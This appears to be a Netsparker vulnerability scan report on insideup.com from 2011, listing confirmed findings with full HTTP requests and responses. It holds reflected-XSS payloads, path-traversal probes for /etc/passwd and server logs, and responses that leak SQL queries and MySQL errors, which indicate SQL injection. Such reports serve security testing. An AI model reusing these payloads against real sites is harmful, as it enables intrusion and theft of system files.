align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" action="communitysignup.html"> <input type="hidden" name="refererUrl" value='http://www.insideup.com/index.html'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="'"--></style></script><script>netsparker(0x000572)</script>" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 formError" /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <td> <input type="text" name="emailA..
- /ppc/leadflow/phsy00/project.php

/ppc/leadflow/phsy00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/phsy00/project.php?catId=110009&iusrc=iupsc&nsextt='%22--%3E%3C..

Parameters

Parameter Type Value
catId GET 110009
iusrc GET iupsc
nsextt GET '"--></style></script><script>alert(0x000575)</script>

Request

GET /ppc/leadflow/phsy00/project.php?catId=110009&iusrc=iupsc&nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000575)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:59 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=0dp23g65m51nvfjolvfuf8aaf6; path=/
Content-Length: 3393
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000575)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000575)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000575)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000575)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000575)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000575)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000575)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000575)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000575)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000575)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x000575)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/lgds00/

/ppc/leadflow/lgds00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/lgds00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..

Parameters

Parameter Type Value
nsextt GET '"--></style></script><script>alert(0x00057D)</script>

Request

GET /ppc/leadflow/lgds00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00057D)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/lgds00/project.php?catId=80005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:02 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=e3it0up695j6il1a9ajdp32so5; path=/
Content-Length: 3033
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/?nsextt='"--></style></script><script>netsparker(0x00057D)</script>' OR prj.project_page_url = 'leadflow/lgds00/?nsextt='"--></style></script><script>netsparker(0x00057D)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/?nsextt='"--></style></script><script>netsparker(0x00057D)</script>' OR prj.project_page_url = 'leadflow/lgds00/?nsextt='"--></style></script><script>netsparker(0x00057D)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/?nsextt='"--></style></script><script>netsparker(0x00057D)</script>' OR prj.project_page_url = 'leadflow/lgds00/?nsextt='"--></style></script><script>netsparker(0x00057D)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/?nsextt='"--></style></script><script>netsparker(0x00057D)</script>' OR prj.project_page_url = 'leadflow/lgds00/?nsextt='"--></style></script><script>netsparker(0x00057D)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/?nsextt='"--></style></script><script>netsparker(0x00057D)</script>' OR prj.project_page_url = 'leadflow/lgds00/?nsextt='"--></style></script><script>netsparker(0x00057D)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x00057D)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/wede00/project.php

/ppc/leadflow/wede00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/wede00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cs..

Parameters

Parameter Type Value
catId GET '"--></style></script><script>alert(0x000579)</script>
iusrc GET iupsc

Request

GET /ppc/leadflow/wede00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000579)%3C/script%3E&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:00 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=aingrt2q69pn376srfihef1v04; path=/
Content-Length: 3253
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='"--></style></script><script>netsparker(0x000579)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='"--></style></script><script>netsparker(0x000579)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='"--></style></script><script>netsparker(0x000579)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='"--></style></script><script>netsparker(0x000579)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='"--></style></script><script>netsparker(0x000579)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='"--></style></script><script>netsparker(0x000579)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='"--></style></script><script>netsparker(0x000579)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='"--></style></script><script>netsparker(0x000579)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='"--></style></script><script>netsparker(0x000579)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='"--></style></script><script>netsparker(0x000579)</script>&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x000579)</script>&iusrc=iupsc/' union sel' at line 5
- /ppc/leadflow/wede00/project.php

/ppc/leadflow/wede00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc='%22--%3E%3C/style%3E%3C/s..

Parameters

Parameter Type Value
catId GET 20001
iusrc GET '"--></style></script><script>alert(0x00058E)</script>

Request

GET /ppc/leadflow/wede00/project.php?catId=20001&iusrc='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00058E)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 